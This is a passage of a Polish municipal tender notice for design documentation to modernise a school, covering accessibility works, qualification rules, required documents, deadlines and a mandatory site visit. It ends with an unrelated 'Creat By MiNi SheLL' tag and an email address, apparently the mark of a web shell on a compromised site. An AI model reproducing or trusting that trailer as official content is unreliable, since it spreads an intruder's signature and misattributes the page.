ewentualną klatką schodową w celu zapewnienia dostępności dla osób z niepełnosprawnościami. <br/>•	Przebudowa budynku i modernizacja budynku w celu zapewnienia dostępności dla osób z niepełnosprawnościami np. poruszających się na wózkach inwalidzkich, osób niedosłyszących i niedowidzących,<br/>•	Przebudowa i remont istniejących instalacji w budynku szkoły: wody, kanalizacji,<br/>•	Przebudowa instalacji elektrycznych,<br/>•	Modernizacja istniejących sanitariatów,<br/>•	Remont piwnic- likwidacja wilgoci na ścianach i posadzkach,<br/>•	Zaprojektowanie w salach lekcyjnych klimatyzacji,<br/>•	Zaprojektowanie systemu zarzadzania budynkiem,<br/>•	Zagospodarowanie terenu wokół budynku elementy małej architektury, zieleń itp.<br/>•	Zaprojektowanie komunikacji na zewnętrz budynku,<br/>•	Modernizacja Sali gimnastycznej wraz z zapleczem sanitarnym i szatniami,<br/>• Oznakowanie komunikacyjne budynku ( tj. oznaczenia sal, pomieszczeń ),<br/>•	Dokumentacja ma być tak przygotowana, aby można było zlecać roboty etapami.<br/><br/>3	Wymagania do każdej części dokumentacji:<br/>1)	Wykonanie inwentaryzacji budynków,<br/>2)	Ilości sal i innych pomieszczeń nie mogą ulec zmniejszeniu,<br/>3)	Rozdzielenie kosztorysów inwestorskich na poszczególne etapy: termomodernizacja, dostosowanie obiektów dla osób o szczególnych potrzebach w niezbędnym zakresie, dostosowanie obiektów dla osób o szczególnych potrzebach kompleksowo, roboty pozostałe,<br/>4)	Zastosowanie materiałów estetycznych, trwałych, odpornych na warunki atmosferyczne, łatwych do czyszczenia i konserwacji, funkcjonalnych - stosownych do funkcji obiektu,<br/>5)	Stosowanie rozwiązań zapewniających optymalne użytkowanie obiektów w przyszłości,<br/>6)	Zaprojektować aranżacje szatni, korytarzy, łazienek i nowych pomieszczeń (projekt posadzek wraz kolorami, projekt ścian, dobór kolorów, materiałów, rozkład mebli), <br/>7)	Część tekstowa dokumentacji projektowej musi być wykonana zgodnie z wytycznymi WCAG 2.1 zawartymi w załączniku do Ustawy z dnia 4 kwietnia 2019 r. o dostępności cyfrowej stron internetowych i aplikacji mobilnych podmiotów publicznych.<br/>8)	Wykonawca, poza plikami do odczytu i wydruku, przekaże zamawiającemu pliki edytowalne projektu, zapisane w formacie programu w którym był realizowany projekt. <br/>9)	Szkoły mają być dostępne dla osób o szczególnych potrzebach, przy wykonywaniu dokumentacji należy opierać się na:<br/>- Modelu dostępnej szkoły: plik jako załącznik do SWZ, model dostępny z a komentarzami na stronie: https://www.dostepnaszkola.info/model-dostepnej-szkoly/<br/>- Raportach z audytów przeprowadzonych w szkołach<br/>10)	Wszystkie rozwiązania techniczne, architektoniczne oraz funkcjonalne należy uzgodnić z Zamawiającym.<br/>11)	Zakończenie instalacji wewnętrznych należy ująć w projektach wykonawczych,<br/>12)	Dokumentacja będzie posiadać wszystkie wymagane uzgodnienia i oświadczenie wykonawcy, że projekt został wykonany zgodnie z wymaganiami i obowiązującymi przepisami oraz jest kompletny z punktu celu, któremu ma służyć. Zakres zamówienia obejmuje uzyskania wszelkich decyzji, pozwoleń, uzgodnień, opinii, ekspertyz oraz zgłoszeń, niezbędnych do wykonania robót budowlanych, Każdy egzemplarz dokumentacji powinien być oprawiony, trwale zszyty mieć ponumerowane strony i rysunki. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 471600 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71327000-6 - Usługi projektowania konstrukcji nośnych</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">365 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wykonawca składając ofertę składa oświadczenie, że Wykonawca nie podlega wykluczeniu.<br/>Najkorzystniejszą ofertą będzie oferta, która przedstawia najkorzystniejszy bilans ceny -100%- oddzielnie dla części 1 i części 2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/><br/>1)	Posiadanie doświadczenia niezbędnego do wykonania przedmiotu zamówienia.<br/>-Zamawiający uzna powyższy warunek za spełniony o ile Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej: dwóch dokumentacji projektowych polegających na opracowaniu dokumentacji projektowej na budowę lub przebudowę* budynku użyteczności publicznej** które zostały zatwierdzone decyzją o pozwoleniu na budowę o wartości opracowania co najmniej 100 000 zł brutto lub zakres opracowania o powierzchni użytkowej większej lub równej 1200 m2.<br/><br/>*budowa, przebudowa- definicja zgodnie z prawem budowlanym<br/>** budynek użyteczności publicznej – Zgodnie z rozporządzeniem w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie budynki<br/><br/><br/>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez załączenie dowodów potwierdzających, że usługi te zostały wykonane w sposób należyty (poświadczenia, referencje). <br/>Zamawiający dopuszcza, w przypadku składania ofert na dwie części zamówienia, aby Wykonawca legitymował się tym samym doświadczeniem dla dwóch części<br/><br/>Przez jedno zamówienie Zamawiający rozumie jedną umowę. <br/>Przez zamówienia wykonane należy rozumieć: <br/>1) zamówienia rozpoczęte i zakończone w w/w okresie <br/>2) zamówienia zakończone w w/w okresie, których rozpoczęcie mogło nastąpić wcześniej niż w w/w okresie. <br/><br/>2) Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.<br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował na czas realizacji zamówienia osobami posiadającymi uprawnienia do projektowania w specjalnościach: <br/>a)	architektonicznej bez ograniczeń. Osoba ta będzie pełniła funkcję projektanta w specjalności architektonicznej. -1 osoba,<br/>b)	konstrukcyjno-budowlanej bez ograniczeń – 1 osoba, <br/>c)	sanitarnej bez ograniczeń – 1 osoba, <br/>d)	elektrycznej bez ograniczeń – 1 osoba, <br/><br/><br/>Osoba, która będzie pełniła funkcję projektanta w specjalności architektonicznej musi:<br/>-wykazać się wykonaniem jako główny projektant co najmniej dwóch dokumentacji projektowych polegających na opracowaniu dokumentacji projektowej na budowę lub przebudowę* budynku użyteczności publicznej** które zostały zatwierdzone decyzją o pozwoleniu na budowę o wartości opracowania co najmniej 100 000 zł brutto lub zakres opracowania o powierzchni użytkowej większej lub równej 1200 m2 <br/><br/>Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.<br/><br/> * Uwagi:<br/>W zakresie wymienionych powyżej uprawnień, Zamawiający uzna odpowiadające im ważne uprawnienia budowlane wydane na podstawie aktualnie obowiązującej ustawy z dnia 7 lipca 1994r.-Prawo budowlane (Dz.U.z2023r., poz.682 ze zm) i Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019r. poz.831) lub odpowiadające im ważne wydane na podstawie wcześniej obowiązujących przepisów, a także odpowiadające im zagraniczne uprawnienia budowlane uznane w zakresie i na zasadach opisanych w ustawie z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych, nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2021r., poz.1646). Zamawiający wymaga, aby osoby kierujące robotami budowlanymi posiadały uprawienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie, w odpowiednich specjalnościach dla poszczególnych branż objętych zakresem zamówienia<br/>Osoby wchodzące w skład personelu Wykonawcy muszą posiadać biegłą znajomość języka polskiego. W przypadku, osoby wchodzące w skład personelu Wykonawcy nie posiadają biegłej znajomości języka polskiego Wykonawca zobowiązany jest zapewnić, na własny koszt tłumacza dla potrzeb i na okres realizacji zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">w celu potwierdzenia okoliczności, o których mowa w art. 108 ust. 1 pkt. 5 ustawy w zakresie braku podstaw wykluczenia z udziału w postępowania o udzielenie zamówienia Wykonawca przedłoży sporządzone na formularzu stanowiącym załącznik do SWZ:<br/> <br/>-oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (tj. Dz. U. z 2020r. poz. 1076 z późn. zmianami) z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. W przypadku wspólnego ubiegania się o udzielenie zamówienia każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest do złożenia w/w dokumentu tj. Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">w celu potwierdzenia okoliczności, o których mowa w art. 112 ust. 2 pkt. 4 ustawy, w zakresie zdolności technicznej lub zawodowej, Wykonawca, na wezwanie Zamawiającego, składa sporządzony wg załącznika do SWZ, <br/>-wykaz dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>-wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego (określonych w Rozdziale VII ust. 2 pkt 4 ppkt 2.), a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> OFERTA MUSI ZAWIERAĆ:<br/><br/>1)	wypełniony formularz OFERTA – załącznik nr 2<br/>UWAGA: W formularzu ofertowym Wykonawca zobowiązany jest dokonać stosownych obliczeń kalkulujących cenę oferty dla danej części. Brak wskazania w ofercie (formularzu cenowym) ceny jednostkowej dla danego opracowania spowoduje odrzucenie oferty. Uzupełnia się dla części, której jest składana oferta.<br/>2)	oświadczenie/a o braku podstaw wykluczenia oraz spełnienia warunków udziału w postępowaniu – załącznik nr 3 <br/>składa Wykonawca; każdy ze wspólników konsorcjum (w przypadku składania oferty wspólnej) oraz każdego ze wspólników spółki cywilnej; podmiotów udostępniających zasoby, czyli podmiotów, na zasoby których powołuje się wykonawca w celu spełnienia warunków udziału w postępowaniu, o których mowa w punktach VIII oraz przesłanek wykluczenia z postępowania, o których mowa w punkcie VII SWZ) <br/>3)	zobowiązanie podmiotu udostępniającego zasoby lub inny dokument (jeśli dotyczy) – zał. nr 5<br/>4)	dokument/y potwierdzający/e umocowanie do reprezentowania Wykonawcy i/lub podmiotu udostepniającego zasoby w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy i/lub podmiotu udostepniającego zasoby jest umocowana do jego reprezentowania:<br/>a) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia w/w dokumentów jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów, przy czym poprzez w/w dane należy rozumieć wskazanie przez Wykonawcę w ofercie lub innych dokumentach załączonych do oferty np. nr KRS, nr NIP, Nr REGON<br/>b)	jeżeli w imieniu wykonawcy i/lub podmiotu udostepniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w ppkt. a), Zamawiający żąda od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy i/lub podmiotu udostepniającego zasoby.<br/>c)	pełnomocnictwo – jeśli wymagane do reprezentowania Wykonawcy/ów w przypadku, gdy: <br/>	Wykonawcę reprezentuje pełnomocnik, <br/>	ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia publicznego o treści wymaganej w art. 58 ust. 2 Pzp (dotyczy również wspólników spółki cywilnej) <br/>	umocowanie nie wynika z ppkt. 4 a) i b) <br/> Dokument/y potwierdzający/e umocowanie do reprezentowania podmiotu udostepniającego zasoby składane są tylko w przypadku korzystania z jego zasobów w celu potwierdzenia spełniania warunków. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VIII ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Możliwości zmiany zawartej umowy oraz warunki takich zmian zostały określone w projektowanych postanowieniach umowy<br/>w sprawie zamówienia publicznego- załącznik nr 1 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-20 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/trzebownisko</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-20 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający informuje, że przed złożeniem oferty wymaga się przeprowadzenia wizji lokalnej. Dla każdej części oddzielnie. Wizja lokalna ma się odbyć najpóźniej 1 dzień przed terminem składania ofert w godzinach pracy Urzędu. Na wizje lokalną można się umówić maksymalnie najpóźniej 2 dni przed składaniem ofert w godzinach pracy urzędu. <br/>Nie możliwe jest złożenie oferty bez przeprowadzenia wizji lokalnej. Zamawiający odrzuci ofertę Wykonawcy, który nie odbył wizji lokalnej w ramach przedmiotowego postępowania. <br/>W celu umówienia wizji lokalnej na terenie inwestycji Wykonawca zobowiązany jest skontaktować się z osobami wyznaczonymi do komunikowania się z wykonawcami tj. Anna Gwóźdź telefon 17 77 13 752. Zamawiający informuje, że w trakcie wizji lokalnej nie będą udzielane żadne odpowiedzi na pytania, będzie sporządzany protokół z tych wizji, wraz z listą obecności potwierdzającą odbycie wizji lokalnej. Potwierdzenie należy dołączyć do oferty. Wszelkie odpowiedzi na pytania zostaną zamieszczone na stronie prowadzonego postępowania.

Creat By MiNi SheLL
Email: jattceo@gmail.com